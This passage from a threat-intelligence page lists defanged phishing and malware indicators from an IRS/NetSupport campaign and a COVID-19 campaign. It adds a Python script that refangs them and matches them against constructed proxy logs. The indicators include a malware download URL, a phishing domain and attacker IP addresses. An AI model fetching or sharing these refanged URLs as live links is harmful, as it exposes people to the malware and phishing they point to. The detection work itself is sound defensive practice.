hXXps://irsbusinessaudit[.]net/DROP.ZIP | 185.225.19.116
hXXp://45[.]76[.]172[.]113/fakeurl.htm | 45.76.172.113
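Both posts above publish their indicators in defanged form (hXXp, [.]), so before they can be matched against proxy or firewall logs they have to be refanged and normalised. The script below is an added example for this page, not Cofense code, and it covers the IOC tables of both the COVID-19 and the IRS/NetSupport posts. It assumes a simple proxy log format (the sample lines are constructed, not real traffic) and treats the IP addresses behind the Typeform and Wufoo URLs as shared form-builder infrastructure, since those addresses front many tenants and an IP hit alone is weak evidence; that classification is this example's assumption, not something the posts state.

```python
import re
from urllib.parse import urlsplit

# IOC table copied from the two posts above (kept defanged, as published).
IOC_TABLE = [
    ("hXXps://5g3poiiecwg[.]typeform[.]com/acknowledgement", ["104.18.26.71", "104.18.27.71"]),
    ("hXXps://andy11[.]wufoo[.]com/forms/z1mh5ftj1a0115p/", ["18.67.65.39", "18.67.65.38"]),
    ("hXXps://irsbusinessaudit[.]net/captcha.php", ["185.225.19.116"]),
    ("hXXps://irsbusinessaudit[.]net/DROP.ZIP", ["185.225.19.116"]),
    ("hXXp://45[.]76[.]172[.]113/fakeurl.htm", ["45.76.172.113"]),
]

# Assumption: form-builder SaaS domains whose IPs serve many tenants. For these the
# tenant-specific URL or hostname is the real indicator; the IP only earns low confidence.
SHARED_SERVICES = ("typeform.com", "wufoo.com")

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def refang(ioc: str) -> str:
    """Undo the hXXp / [.] defanging so indicators can be compared with live data."""
    ioc = re.sub(r"^hxxp", "http", ioc, flags=re.IGNORECASE)
    return ioc.replace("[.]", ".").replace("[:]", ":")


def build_watchlist(table=IOC_TABLE) -> dict:
    """Return {'urls': set, 'hosts': set, 'ips': {ip: confidence}} from the IOC table."""
    urls, hosts, ips = set(), set(), {}
    for raw_url, raw_ips in table:
        url = refang(raw_url).lower()
        host = urlsplit(url).hostname
        urls.add(url)
        hosts.add(host)
        shared = host.endswith(SHARED_SERVICES)
        for ip in raw_ips:
            ip = refang(ip)
            if ips.get(ip) != "high":          # never downgrade an IP already rated high
                ips[ip] = "low" if shared else "high"
    return {"urls": urls, "hosts": hosts, "ips": ips}


def scan_log(lines, watchlist=None) -> list:
    """Match each log line against the watchlist; one hit per indicator found."""
    wl = watchlist or build_watchlist()
    hits = []
    for number, line in enumerate(lines, start=1):
        for url in URL_RE.findall(line):
            url = url.lower()
            host = urlsplit(url).hostname
            if url in wl["urls"]:
                hits.append({"line": number, "indicator": url, "confidence": "high"})
            elif host in wl["hosts"]:
                hits.append({"line": number, "indicator": host, "confidence": "high"})
        for ip in IP_RE.findall(line):
            if ip in wl["ips"]:
                hits.append({"line": number, "indicator": ip, "confidence": wl["ips"][ip]})
    return hits


# Constructed proxy log lines (timestamp, client, method, URL or host, status); not real traffic.
SAMPLE_LOG = [
    "2022-03-14T10:02:11Z 10.1.2.3 GET https://5g3poiiecwg.typeform.com/acknowledgement 200",
    "2022-03-14T10:05:40Z 10.1.2.3 GET https://irsbusinessaudit.net/DROP.ZIP 200",
    "2022-03-14T10:06:02Z 10.1.2.3 CONNECT 185.225.19.116:443 -",
    "2022-03-14T10:07:30Z 10.1.2.9 GET https://www.example.com/ 200 104.18.26.71",
    "2022-03-14T10:08:00Z 10.1.2.9 GET https://intranet.example.com/policy.pdf 200",
]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['indicator']} ({hit['confidence']})")
```

Running the script over the constructed log reports the Typeform URL, the DROP.ZIP download and the connection to 185.225.19.116 as high-confidence hits, while the shared 104.18.26.71 address on an unrelated request is only a low-confidence hit that needs a URL or hostname to corroborate it.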
